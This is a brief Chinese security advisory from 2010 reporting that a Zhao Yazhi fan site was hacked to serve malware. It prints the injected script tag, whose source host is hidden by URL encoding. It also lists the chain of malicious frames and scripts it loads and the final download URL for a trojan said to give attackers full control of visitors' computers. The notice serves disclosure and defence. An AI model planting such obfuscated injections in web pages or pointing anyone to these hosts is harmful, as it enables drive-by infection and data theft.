赵雅芝中文网被植入恶意代码

来源:岁月联盟 编辑:zhuzhu 时间:2010-02-13
赵雅芝中文网(http://bac.angie.cn/index.php)被植入恶意代码。

  用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

  MalUrl:http://bac.angie.cn/index.php

  网页被嵌入恶意链接代码:

  <script src=http://%6D%62%72%32%2E%63%6E></script>

  挂马分析:

  [wide]http://bac.angie.cn/index.php

  [script]http://%6d%62%72%32%2e%63%6e

  [frame]http://xxxo1.cn/a/a7.htm

  [frame]http://xxxo1.cn/a/cnzz.htm

  [frame]http://xxxo1.cn/a/kk.htm

  [frame]http://xxxo1.cn/a/flash.htm

  [frame]http://xxxo1.cn/a/xx.htm

  [frame]http://xxxo1.cn/a/office.htm

  [frame]http://xxxo1.cn/a/02.htm

  [script]http://xxxo1.cn/a/reee.js

  [script]http://xxxo1.cn/a/rkkk.js

  [script]http://js.tongji.cn.yahoo.com/1081870/ystat.js

  [script]http://s23.cnzz.com/stat.php?id=1408290&web_id=1408290

  最终下载病毒文件:

  http://xin89221.com/love/windoss.css

  通过执行以上病毒文件,来达到完全控制访问者的系统。